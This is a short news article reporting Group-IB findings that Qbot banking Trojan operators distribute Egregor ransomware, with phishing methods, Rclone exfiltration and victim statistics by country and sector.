Qbot Trojan Incorporates Egregor Ransomware to Steal Bank Credentials from Companies Worldwide

Researchers from Singaporean threat hunting and intelligence firm Group-IB said that operators of Qbot banking Trojan started launching cyber-attacks using Egregor ransomware to steal bank credentials from international firms.

Researchers from Singaporean threat hunting and intelligence firm Group-IB said that operators of Qbot banking Trojan started launching cyber-attacks using Egregor ransomware to steal bank credentials from international firms.

Qbot, also called QakBot or QuakBot, is a notorious banking Trojan that has a component to record logging keystrokes of victims to steal their credentials and then use it in committing fraud.

This Windows malware could also be used by perpetrators to access the Windows domain credentials of their victims, allowing them to steal login data from browsers and web servers of banks.

The operators of Qbot started actively distributing the newly discovered ransomware variant called Egregor in September.

Since the launch of the Egregor operations, many companies around the world became victims of the hackers.

“In less than 3 months Egregor operators have managed to successfully hit 69 companies around the world with 32 targets in the US, 7 victims in France and Italy each, 6 in Germany, and 4 in the UK. Other victims happened to be from the APAC, Middle East, and Latin America,” said Oleg Skulkin, Senior Digital Forensics Analyst at Group-IB.

According to the Singapore-based cybersecurity firm, operators infect victims with Qbot through phishing emails utilizing Excel documents, impersonating them as DocuSign-encrypted spreadsheets.

Egregor operators then use the computer program called Rclone for data exfiltration – similar to how ProLock ransomware works.

According to Skulkin, about 28.9 percent of the victims of the ransomware operations came from the manufacturing sector and around 14.5 percent of the attacks occurred in the retail industry.


© Fourth Estate® — All Rights Reserved.
This material may not be published, broadcast, rewritten or redistributed.